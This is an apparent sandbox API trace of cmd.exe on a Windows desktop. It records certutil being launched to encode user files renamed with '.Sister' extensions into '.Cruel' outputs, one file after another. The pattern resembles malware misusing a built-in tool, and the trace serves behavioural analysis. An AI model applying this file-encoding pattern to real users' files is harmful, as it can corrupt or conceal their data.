lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0266.164] GetProcessHeap () returned 0x21ed8c70000 [0266.164] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.166] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.167] GetProcessHeap () returned 0x21ed8c70000 [0266.167] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0266.167] GetProcessHeap () returned 0x21ed8c70000 [0266.167] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95660 [0266.167] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0266.167] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0266.248] _get_osfhandle (_FileHandle=0) returned 0x4c [0266.248] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0266.342] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.wav.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd70, dwThreadId=0xd28)) returned 1 [0266.352] CloseHandle (hObject=0xa4) returned 1 [0266.352] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.352] GetProcessHeap () returned 0x21ed8c70000 [0266.353] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0266.353] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0266.353] GetProcessHeap () returned 0x21ed8c70000 [0266.353] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0266.353] FreeEnvironmentStringsA (penv="=") returned 1 [0266.353] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0268.293] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0268.293] CloseHandle (hObject=0xa8) returned 1 [0268.294] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0268.294] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0268.294] GetProcessHeap () returned 0x21ed8c70000 [0268.294] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0268.294] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0268.294] GetProcessHeap () returned 0x21ed8c70000 [0268.294] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0268.294] FreeEnvironmentStringsA (penv="=") returned 1 [0268.294] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0268.295] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d60f30 [0268.295] FreeEnvironmentStringsA (penv="=") returned 1 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95660) returned 1 [0268.295] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0268.295] ??_V@YAXPEAX@Z () returned 0x1 [0268.295] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="YgF_fsDPEPZ_A1NWq.png.Sister", cAlternateFileName="")) returned 1 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44660, Size=0x652) returned 0x21ed8d603e0 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d603e0) returned 0x652 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29c00 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.295] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29c00, Size=0x58) returned 0x21ed8d29c00 [0268.295] GetProcessHeap () returned 0x21ed8c70000 [0268.296] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29c00) returned 0x58 [0268.296] GetProcessHeap () returned 0x21ed8c70000 [0268.296] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29c70 [0268.296] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0268.296] GetProcessHeap () returned 0x21ed8c70000 [0268.296] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4a) returned 0x21ed8c7cb80 [0268.296] ??_V@YAXPEAX@Z () returned 0x1 [0268.296] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0268.296] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0268.296] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0268.296] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0268.296] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0268.297] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xca24348f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xca24348f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0268.297] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0268.297] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\YgF_fsDPEPZ_A1NWq.png.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687668f0, ftCreationTime.dwHighDateTime=0x1d5ee07, ftLastAccessTime.dwLowDateTime=0x30f0edd0, ftLastAccessTime.dwHighDateTime=0x1d5eb4e, ftLastWriteTime.dwLowDateTime=0x30f0edd0, ftLastWriteTime.dwHighDateTime=0x1d5eb4e, nFileSizeHigh=0x0, nFileSizeLow=0xf9ba, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="YgF_fsDPEPZ_A1NWq.png.Sister", cAlternateFileName="YGF_FS~1.SIS")) returned 0x21ed8c7d060 [0268.297] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0268.297] _wcsnicmp (_String1="YGF_FS~1.SIS", _String2="YgF_fsDPEPZ_A1NWq.png.Sister", _MaxCount=0x1c) returned 26 [0268.297] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0268.297] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0268.297] GetProcessHeap () returned 0x21ed8c70000 [0268.297] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8cc7ec0 [0268.297] ??_V@YAXPEAX@Z () returned 0x1 [0268.297] ??_V@YAXPEAX@Z () returned 0x1 [0268.298] GetProcessHeap () returned 0x21ed8c70000 [0268.298] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29c70, Size=0x240) returned 0x21ed8d29c70 [0268.298] GetProcessHeap () returned 0x21ed8c70000 [0268.298] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29c70) returned 0x240 [0268.298] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0268.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.298] GetFileType (hFile=0x50) returned 0x2 [0268.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.298] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0268.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.366] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0268.441] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0268.441] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0268.441] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0268.441] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0268.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.441] GetFileType (hFile=0x50) returned 0x2 [0268.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.441] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0268.511] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.511] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0268.582] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.582] GetFileType (hFile=0x50) returned 0x2 [0268.582] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.582] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0268.707] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.707] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d29c10*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d29c10*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0268.820] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\" ") returned 70 [0268.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.820] GetFileType (hFile=0x50) returned 0x2 [0268.820] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.820] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0268.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.898] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x46, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x46) returned 1 [0268.972] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0268.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0268.972] GetFileType (hFile=0x50) returned 0x2 [0268.972] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.972] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0269.055] _get_osfhandle (_FileHandle=1) returned 0x50 [0269.055] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0269.130] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0269.235] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0269.235] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0269.235] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0269.235] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0269.235] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0269.235] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0269.235] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0269.235] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0269.235] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0269.235] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0269.235] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0269.235] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0269.235] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0269.235] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0269.235] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0269.235] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0269.235] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0269.235] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0269.235] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0269.235] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0269.235] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0269.235] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0269.236] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0269.236] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0269.236] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0269.236] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0269.236] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0269.236] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0269.236] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0269.236] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0269.236] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0269.236] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0269.236] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0269.236] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0269.236] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0269.236] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0269.236] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0269.236] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0269.236] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0269.236] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0269.236] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0269.236] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0269.236] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0269.236] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0269.236] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0269.236] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0269.236] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0269.237] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0269.237] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0269.237] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0269.237] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0269.237] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0269.237] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0269.237] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0269.237] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0269.237] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0269.237] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0269.237] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0269.237] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0269.237] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0269.237] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0269.237] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0269.237] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0269.237] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0269.237] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0269.237] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0269.237] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0269.237] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0269.237] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0269.237] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0269.237] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0269.237] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0269.237] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0269.238] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0269.238] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0269.238] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0269.238] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0269.238] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0269.238] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0269.238] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0269.238] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0269.238] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0269.238] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0269.238] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0269.238] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0269.238] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0269.238] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0269.238] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0269.238] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0269.238] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0269.238] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0269.238] ??_V@YAXPEAX@Z () returned 0x1 [0269.238] GetProcessHeap () returned 0x21ed8c70000 [0269.238] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93f0ee0 [0269.238] GetProcessHeap () returned 0x21ed8c70000 [0269.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96940 [0269.239] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0269.239] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0269.239] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0269.239] GetProcessHeap () returned 0x21ed8c70000 [0269.239] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9400ed0 [0269.241] SetErrorMode (uMode=0x0) returned 0x0 [0269.241] SetErrorMode (uMode=0x1) returned 0x0 [0269.241] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9400ee0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0269.241] SetErrorMode (uMode=0x0) returned 0x1 [0269.241] GetProcessHeap () returned 0x21ed8c70000 [0269.241] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9400ed0, Size=0x52) returned 0x21ed9400ed0 [0269.241] GetProcessHeap () returned 0x21ed8c70000 [0269.241] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9400ed0) returned 0x52 [0269.241] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0269.241] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0269.241] GetProcessHeap () 